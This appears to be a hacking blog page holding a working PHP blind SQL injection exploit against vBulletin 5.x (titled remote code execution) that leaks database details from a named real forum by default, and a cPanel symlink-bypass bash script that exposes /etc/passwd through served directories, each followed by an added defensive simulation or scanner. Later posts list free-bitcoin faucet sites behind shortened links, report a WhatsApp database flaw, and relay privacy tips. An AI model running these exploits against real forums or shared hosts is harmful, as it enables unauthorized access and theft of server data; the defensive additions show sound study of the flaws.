[+] Wayc0de's Blog[+]

19/09/14

vBulletin 5.x Remote Code Execution Exploit

<?php

/*
    Author: Nytro
    Powered by: Romanian Security Team
    Price: Free. Educational.

    Note: despite the title, what this script performs is a blind SQL injection
    through the memberlist "startswith" filter (ajax/render/memberlist_items).
    It leaks version(), user() and database() one character at a time by
    comparing the first letter of every username against the target string;
    no code is executed on the server.
*/

error_reporting(E_ALL);
ini_set('display_errors', 1);

// Get arguments

$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
// The endpoint answers with JSON, so slashes in the URL come back escaped as \/
$expression = str_replace('/', '\\/', $target_url);

// Function to send a POST request

function httpPost($url, $params)
{
    $ch = curl_init($url);

    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

    // Mimic the browser's XHR; securitytoken=guest is enough, no login is needed
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'X-Requested-With: XMLHttpRequest',
        'Referer: https://rstforums.com/v5/memberlist',
        'Accept-Language: en-US,en;q=0.5',
        'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
    ));

    $output = curl_exec($ch);

    if ($output === false) print htmlspecialchars(curl_error($ch));

    curl_close($ch);
    return $output;
}

// Function to get string between two other strings

function get_string_between($string, $start, $end)
{
    $string = " " . $string;
    $ini = strpos($string, $start);
    if ($ini == 0) return "";
    $ini += strlen($start);
    $len = strpos($string, $end, $ini) - $ini;
    return substr($string, $ini, $len);
}

// Leak a MySQL expression one character at a time.  The injected condition
//   " OR SUBSTR(user.username,1,1)=SUBSTR(<expr>,N,1)--
// makes the memberlist return every user whose username starts with the N-th
// character of <expr>, so the first letter of the first username returned is
// that character.  When nothing matches, either the string has ended or no
// username starts with that character, and the loop stops.

function leak_string($target_url, $expression, $sql_expr)
{
    $leaked = '';

    for ($letter = 1; ; $letter++) {
        $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(' . $sql_expr . ',' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');

        if ($result === false || strpos($result, 'No Users Matched Your Query') !== false) break;

        $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
        if (!isset($exploded[1])) break;   // response did not contain the expected markup

        $username = get_string_between($exploded[1], '">', '<\/a>');
        if ($username === '') break;

        print $username[0];
        $leaked .= $username[0];
    }

    return $leaked;
}

print "\r\nvBulletin 5.x Remote Code Execution Exploit\r\n\r\n";

// Get version
print "Version: ";
leak_string($target_url, $expression, 'version()');

// Get user
print "\r\nUser: ";
leak_string($target_url, $expression, 'user()');

// Get database
print "\r\nDatabase: ";
leak_string($target_url, $expression, 'database()');

print "\r\n";

?>
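The injection the script above drives, modelled as an added example that is not part of Nytro's exploit or of vBulletin's code: an in-memory SQLite database stands in for the forum's MySQL back end, the `user` table and `username` column are assumed, the vulnerable query uses a single-quoted literal (so the payload opens with `'` instead of the `"` the real exploit sends), and `sqlite_version()` takes the place of MySQL's `version()`. The sample usernames are constructed. The same character-by-character oracle recovers the version string from the concatenating endpoint and recovers nothing from the parameterised one.

```python
import sqlite3

# Constructed sample data (not real forum users): usernames whose first
# characters cover the digits and the dot that a version string is made of.
USERS = ["admin", "alice", "bob", ".dotfile"] + ["%duser" % d for d in range(10)]


def make_db():
    """In-memory stand-in for vBulletin's `user` table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (userid INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO user (username) VALUES (?)", [(u,) for u in USERS])
    return conn


def memberlist_vulnerable(conn, startswith):
    """Models the flaw: the startswith filter is concatenated into the SQL."""
    sql = ("SELECT username FROM user WHERE username LIKE '" + startswith + "%' "
           "ORDER BY username ASC LIMIT 10")
    return [row[0] for row in conn.execute(sql)]


def memberlist_fixed(conn, startswith):
    """Parameterised query: the value can never change the statement structure."""
    sql = "SELECT username FROM user WHERE username LIKE ? ORDER BY username ASC LIMIT 10"
    return [row[0] for row in conn.execute(sql, (startswith + "%",))]


def leak_expression(lookup, sql_expr, max_len=64):
    """Recover `sql_expr` one character at a time through the memberlist oracle.

    `lookup(startswith)` returns the usernames the endpoint lists.  Position N
    is answered by every user whose first letter equals SUBSTR(expr, N, 1); an
    empty answer means the string has ended or no username starts with that
    character, which is exactly where the original exploit stops as well.
    """
    leaked = ""
    for pos in range(1, max_len + 1):
        # closes the literal, ORs in the comparison, comments out the rest
        payload = "' OR SUBSTR(username,1,1)=SUBSTR(%s,%d,1)--" % (sql_expr, pos)
        rows = lookup(payload)
        if not rows:
            break
        leaked += rows[0][0]
    return leaked


def demo():
    """Returns (leaked via injection, real version, leaked via fixed endpoint)."""
    conn = make_db()

    def vuln(startswith):
        return memberlist_vulnerable(conn, startswith)

    def fixed(startswith):
        return memberlist_fixed(conn, startswith)

    return (leak_expression(vuln, "sqlite_version()"),
            sqlite3.sqlite_version,
            leak_expression(fixed, "sqlite_version()"))


if __name__ == "__main__":
    leaked, real, through_fixed = demo()
    print("leaked via injection:", leaked, "(real: %s)" % real)
    print("leaked via parameterised query:", repr(through_fixed))
```

The oracle has the limitation the original loop inherits: a character that no username begins with ends the extraction early (leaking the literal `'ab-ba'` yields only `ab` against the sample data), which is why the exploit is noisy on small forums and why the fix is the parameterised query, not a filter on the input.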


CPanel Symlink Bypasser

#!/bin/bash
# ______ __ ____ ___
# / ____/___ ____ _____ ___ / / / __ )__ ______ ____ ______________ _____ _ _< /
# / / / __ \/ __ `/ __ \/ _ \/ / / __ / / / / __ \/ __ `/ ___/ ___/ _ \/ ___/ | | / / /
# / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / /
# \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/
# /_/ /____/_/
############################################
# CPanel Symlink Bypasser [Public Version] #
# By Hannibal Ksa (@r00t3rz) & R3m0t3 Nu11 #
# alm3refh.com © Group XP 2014 #
############################################
#
# USAGE:
# 1. UPLOAD ME IN /home/user as Cpbypass.sh
# 2. GO TO CRON JOB
# 3. ADD THIS COMMAND:
# echo "Alm3refh bypass" ~| bash Cpbypass.sh -s "Alm3refh bypass" -- email@gmail.com
#
# email@gmail.com = your email
#
#
# THE FILE WILL SHOW YOU HOW TO SEE/DOWNLOAD YOUR SYMLINK!
# PS: ENJOY!
#
#
##########
# FILE #
##########
SYM="/etc/passwd"
########
echo ""
echo " ______ __ ____ ___"
echo " / ____/___ ____ _____ ___ / / / __ \)__ ______ ____ ______________ _____ _ _< /"
echo " / / / __ \/ __ \`/ __ \/ _ \/ / / __ / / / / __ \/ __ \`/ ___/ ___/ _ \/ ___/ | | / / / "
echo " / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / / "
echo " \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/ "
echo " /_/ /____/_/ "
echo " CPanel Symlink Bypasser [Public Version]"
echo " By Hannibal Ksa & R3m0t3 Nu11"
echo ""
echo ""
########
rand=bypass$(( $RANDOM % 10 + 100 ));
###
# 1st 3xpl017
###
# All paths below are relative to the account's home directory, which is where
# the cron job from USAGE runs; the symlinks land in directories that cPanel's
# own web server (port 2083) serves without the symlink checks Apache applies.
ln -sf $SYM tmp/analog/$rand.html
echo ""
echo "1st Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/analog/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "user=cpanel user"
echo ""
###
# 2nd 3xpl017
###
ln -sf $SYM tmp/webalizer/$rand.html
echo ""
echo "2nd Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizer/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "user=cpanel user"
echo ""
###
# 3rd 3xpl017
###
ln -sf $SYM tmp/webalizerftp/$rand.html
echo ""
echo "3rd Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizerftp/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "user=cpanel user"
echo ""
###
# 4th 3xpl017
###
ln -sf $SYM logs/$rand.doc
echo ""
echo "4th Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/frontend/x3/raw/index.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo ""
echo "THEN SCROLL DOWN 'TIL YOU SEE $rand.doc AND DOWNLOAD IT!"
echo ""
# DONE of the public version!
# E0F
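A defender-side counterpart to the script above, as an added example that is not part of the original tool or of cPanel: the bypass works by planting symlinks to files outside the account (SYM="/etc/passwd") in directories that cPanel's own web interface is willing to serve (tmp/analog, tmp/webalizer, tmp/webalizerftp and the raw log listing), so the check a hosting operator wants is a scan of each account's home directory for symlinks whose resolved target escapes it. The scanner below does that; the directory layout, file names and contents built in `demo()` are constructed to mirror the script's targets.

```python
import os
import tempfile


def escaping_symlinks(home):
    """Return (link, resolved_target) for every symlink under `home` whose
    final target lies outside `home`.

    Targets are resolved with realpath, so relative links and chains of links
    are followed to the end, while the walk itself never follows links
    (followlinks=False), so a link pointing at / cannot drag the scan across
    the whole disk.
    """
    home_real = os.path.realpath(home)
    flagged = []
    for dirpath, dirnames, filenames in os.walk(home_real, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            # commonpath, not startswith: /home/user2 must not count as inside /home/user
            if os.path.commonpath([home_real, target]) != home_real:
                flagged.append((path, target))
    return flagged


def demo():
    """Build a throwaway home directory laid out like the script's targets
    (constructed data) and return the links the scanner flags, relative to it."""
    with tempfile.TemporaryDirectory() as root:
        home = os.path.join(root, "home")
        outside = os.path.join(root, "outside", "passwd")   # stand-in for /etc/passwd
        for d in ("tmp/analog", "logs", "public_html", "docs"):
            os.makedirs(os.path.join(home, d))
        os.makedirs(os.path.dirname(outside))
        with open(outside, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash\n")
        with open(os.path.join(home, "docs", "index.html"), "w") as f:
            f.write("<h1>ok</h1>\n")

        # absolute target outside the home, like SYM="/etc/passwd" in the script
        os.symlink(outside, os.path.join(home, "tmp", "analog", "bypass101.html"))
        # relative target that climbs out of the home
        os.symlink("../../outside/passwd", os.path.join(home, "logs", "bypass101.doc"))
        # chain: a link inside the home that points at the escaping link above
        os.symlink("../logs/bypass101.doc", os.path.join(home, "tmp", "chain"))
        # legitimate relative link that stays inside the home
        os.symlink("../docs/index.html", os.path.join(home, "public_html", "latest"))

        home_real = os.path.realpath(home)
        return sorted(os.path.relpath(link, home_real)
                      for link, _ in escaping_symlinks(home))


if __name__ == "__main__":
    for link in demo():
        print("escapes home:", link)
```

Run it over `/home/<account>` from a privileged cron job and alert on anything it returns; the chain case matters because a two-hop link whose first hop stays inside the home defeats a check that only inspects `os.readlink()` of each link.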

21/03/14

Listing Website Free Bitcoin Part 1

Free Bitcoin? Yes, that's right.

Here I will share a few sites that we can use to get bitcoin for free. Some require you to type a captcha, others make you wait a few minutes or hours, and so on.

So, check it out, bro!!!

ROLL & DICES

1. http://cur.lv/8f7nz (FreeBitCoinWin) 1 roll per hour
2. http://cur.lv/8f7px (FreeBitCoin) 1 roll per hour
3. http://cur.lv/8f7qy (BTCFreeGame)
4. http://cur.lv/8f7s1 (999Dice)
5. http://cur.lv/8f8fq (gratisbitco)
6. http://cur.lv/8f8nb (phambit) 1 draw per hour

That's it for now on websites that offer free bitcoin; I'll share more of them later.

regards : Wayc0de

13/03/14

Hackers can steal Whatsapp conversations due to Android security flaw

A SECURITY VULNERABILITY in the Android mobile operating system has been discovered that can allow cyber criminals to steal conversations from users of the mobile messaging service Whatsapp.
Discovered by Bas Bosschert, the CTO of startup company Doublethink, the flaw was detailed in a blog post in which Bosschert demonstrated the method for accessing Whatsapp chats. He confirmed that the vulnerability still exists even after the recent Whatsapp update for Android.
The exploit is possible due to the Whatsapp database on Android being saved on the SD card, which can be read by any Android application if the user allows it to access the card.
"And since majority of the people [allow] everything on their Android device, this is not much of a problem," Bosschert said, noting that this is an issue in the Android infrastructure, specifically a problem with Android's data sandboxing system, as opposed to a security flaw in Whatsapp.
From there, a malicious app could access the Whatsapp conversation database, Bosschert said, testing his method with a companion app that he built, which uses a loading screen to distract the user while the database files are being uploaded.
Bosschert said that he can even decrypt the database with his own script despite the Whatsapp application's attempts in its recent update to encrypt the database to the point where it can't be opened by SQLite.
"We can simply decrypt this database using a simple python script," Bosschert said. "This script converts the [encrypted] database to a plain SQLite3 database.
"So, we can conclude that every application can read the Whatsapp database and it is also possible to read the chats from the encrypted databases. Facebook didn't need to buy Whatsapp to read your chats."
The full step by step guide for how he hacked Whatsapp can be found in Bosschert's blog post.
Whatsapp added privacy features and the ability to pay for a friend's subscription when it updated its Android app on Monday.
The added privacy includes controls for users to hide when they were last seen, their profile photo and their status updates from prying eyes.
While these are not groundbreaking changes, releasing a privacy update will likely appease users following Facebook's $19bn acquisition of the company, which has sparked privacy fears among Whatsapp users. These concerns are ongoing, as privacy groups called for the FTC to investigate the buyout last week, saying that it represents a threat to privacy.

How to Use Edward Snowden’s Three Tips for Digital Privacy

Former NSA contractor Edward Snowden says he has been able to outfox U.S. officials using encryption. During a webcast on NSA leaks and data security at the South by Southwest conference in Austin, Texas, Snowden shared some privacy tips for the rest of us: Encrypt your hard drive, use plug-ins for your browser that prevent organizations or companies from tracking you online, and cover your tracks with Tor, an online network that promises anonymity.
These tips range from simple to complicated depending on your computer savvy, so we’ve collected some basic info and guides to help you get started:
Encrypt your hard drive
Encryption is the “Defense Against the Dark Arts” for the digital world, said Snowden, referencing the class Harry Potter took during his Hogwarts years.
Adding password protection to files on your computer is just the first step to personal file security. Encrypting the entire hard disk on your computer ensures personal information is secure, even if your device is stolen or seized.
Newer versions of the Windows and Mac operating systems come with built-in disk encryption tools. BitLocker, which encrypts your entire hard drive, comes as part of the Windows 7 Ultimate and Enterprise versions and the Windows 8.1 Pro and Enterprise editions. Microsoft and Apple offer detailed tutorials online on how their disk encryption tools can be turned on. For those with older operating systems, there's TrueCrypt, a free program for encrypting your drive. Here's a guide on how to download and install it.
The Electronic Frontier Foundation, an organization that works on digital rights issues, has a guide to how encryption can help in different situations.
Use browser plug-ins to avoid being tracked online
The Wall Street Journal's series 'What They Know' showed that companies use digital tracking of online activities such as shopping, varying prices based on shopping patterns and location information. While that may seem harmless, it's important to know that if retailers can see you, it's likely that others can as well.
Slowly, companies such as Google have agreed to support a do-not-track button embedded in most Web browsers. Google's Chrome browser has a setting that most users can turn on to send a do-not-track request, and so does Microsoft's Internet Explorer 10. They won't work with all websites, but it's a good place to begin.
Plug-ins, small software extensions available for browsers, are another way to go about it. Ghostery, a plug-in available for most popular browsers, shows the number of trackers detected on a page but does not block them automatically; users can block them individually or in bulk.
You can also choose sites, such as the search engine DuckDuckGo, which do not record or share your searches.
Cover your tracks with Tor
Over the last few months, Tor, a network that promises anonymity and privacy online, has come under the spotlight. Tor hosts a network of websites, some of which have been under the scanner of law enforcement officials for illegal activities. Late last year, the Federal Bureau of Investigation shut down Silk Road, a marketplace available only through the Tor network, for the sale of illegal drugs.
Tor may be useful for criminals, but its cloak of anonymity is increasingly a comfort to anyone looking for privacy. Tor offers its own browser that can be used to connect to news sites or instant messaging services and chat rooms that can’t be easily tracked online.
To get started on the Tor network, take the advice of the ExtremeTech blog, and download the Tor Browser Bundle available for Windows, Mac and Linux. It’s similar to using the Firefox or Chrome browser but slower, because Internet traffic is routed through a series of proxies to mask its origin.
Other ways to lower your online profile include using encrypted chat services such as SilentCircle, and encrypted mail such as Hushmail. There are even smartphones coming out soon that will offer a suite of privacy features baked right in.
